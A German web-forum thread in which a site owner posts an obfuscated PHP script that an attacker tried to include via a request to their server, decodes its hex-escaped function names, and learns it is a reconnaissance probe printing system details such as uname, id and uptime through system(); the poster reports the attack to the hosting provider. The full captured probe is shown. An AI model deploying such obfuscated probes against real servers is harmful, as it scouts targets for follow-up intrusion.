hackangriff, code der ausgeführt werden sollte

easteregg

easteregg

0
heyhey,

hier wurde grad nen request an meinen server abgesetzt den ich zufällig gesehen hab. der verlier zwar ohnehin ins leere hat aber versucht das hier zu includieren :D

PHP: 
<?php
    $x1c = "\x64\151\163k\146\162\145e\x73\160\x61\x63\x65";
	$x1d = "\144i\163\x6b_\164o\164a\154\137\x73\160\x61ce";
	$x1e = "\x67\145\x74\x63\x77d";
	$x1f = "\x67e\164\x65\x6e\166";
	$x20 = "\x67\145t\150\157s\x74by\156\x61\155\145";
	$x21 = "\x70\150\x70\x5fu\x6e\141\155e";
	$x22 = "\x70\x68\x70\166e\162\163\x69\157n";
	$x23 = "\163\x70r\x69\x6et\x66";
	$x24 = "\163tr\154e\x6e";
	$x25 = "\x73y\163\164\x65\155";
 
	function ConvertBytes($x0b){ 
		global $x1c,$x1d,$x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25;
		$x0c  =  $x24($x0b);
		if( $x0c < 4) { 
			return $x23 ("\045d\040\142", $x0b);
		}
		if ($x0c > =  4 && $x0c < = 6) {
			return $x23("\045\x30.\x32f\040K\142", $x0b/1024);
		}
		if($x0c > =  7 && $x0c < = 9) {
			return $x23("%\x30\056\x32\x66 \115b", $x0b/1024/1024);
		} 
		
		return $x23("%0\x2e\062\146 Gb", $x0b/1024/1024/1024);
			
	}
	
	echo "\x66\151\147\x62a\x79\x69\154\157\146i\x6cogba<\x62r\076";
	$x0d  =  @$x21();
	$x0e  =  $x25(uptime);
	$x0f  =  $x25(id);
	$x10  =  @$x1e();
	$x11  =  $x1f("\x53\x45\122\x56\x45\122\x5f\x53O\106\124\x57A\122\105");
	$x12  =  $x22();
	$x13  =  $_SERVER['SERVER_NAME'];$x14  =  $x20($x15);
	$x16  =  $x1c($x10);
	$x17  =  ConvertBytes($x1c($x10));
	if (!$x17) {
		$x17  =  0;
	}
	
	$x18 =  $x1d($x10);
	$x19  =  ConvertBytes($x1d($x10));
	if (!$x19) {
		$x19  =  0;
	}
	$x1a  =  ConvertBytes($x18-$x16);
	$x1b  =  @PHP_OS;
	echo "\146\x69\x67\142\x61y\x69\x6co\146i\x6c\x6fg\x62\x61\074\142\162\076";
	echo "\165n\141\x6d\145 -\141: $x0d<\x62\162\x3e";
	echo "os\072 $x1b\x3c\x62\162\x3e";
	echo "\165\x70\164i\155\x65\072 $x0e<\x62\x72\076";
	echo "\x69d\072 $x0f<\142\x72>";
	echo "\160w\x64\x3a $x10<\x62r>";
	echo "p\150p\x3a\040$x12\x3c\x62\162>";
	echo "\163\x6f\x66\x74\167a\162\x65:\x20$x11\x3c\x62\162>";
	echo "\x73\x65r\x76\x65r\x2d\x6e\141\155\145\x3a\x20$x13\074\142\162\076";
	echo "s\145\x72ver\x2d\x69p\072 $x14\x3c\x62\162\x3e";
	echo "f\162\145\145:\040$x17<br\x3e";
	echo "u\163\145d\072\040$x1a\074b\x72>";
	echo "to\164\141\x6c:\x20$x19<\142\x72>";
	
	exit;
?>

so richtig schlau werd ich nicht, sind da funktionsnamen als hex verschleiert oder wie?

edit:// tatsache, die fukntionsnamen von oben nach unten:

diskfreespace
disk_total_space
getcwd
getenv
gethostbyname
php_uname
phpversion
sprintf
strlen
system
Zum Vergrößern anklicken....
 
Zuletzt bearbeitet:
solche nasen hab ich auch dauernd ... wenn du mal lustig drauf bist ... versuch mal scriptmäßig den angriff zu erkennen, und eine passende ausgabe zu simulieren ...
 
nuja, ich hab das script mal weiter zerlegt, das macht nix weiter, als systeminfos auszugeben, welche uid der webserver hat und was fürn system läuft.
die frage ist, ob dann eben folgeangriffe kommen, wenn die das schon ausgeführt haben und was sinvolles erhalten haben :D

hab jetzt einfach an den hostinganbieter wo der angriff herkam ne mail an deren abuse@ adresse geschrieben
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben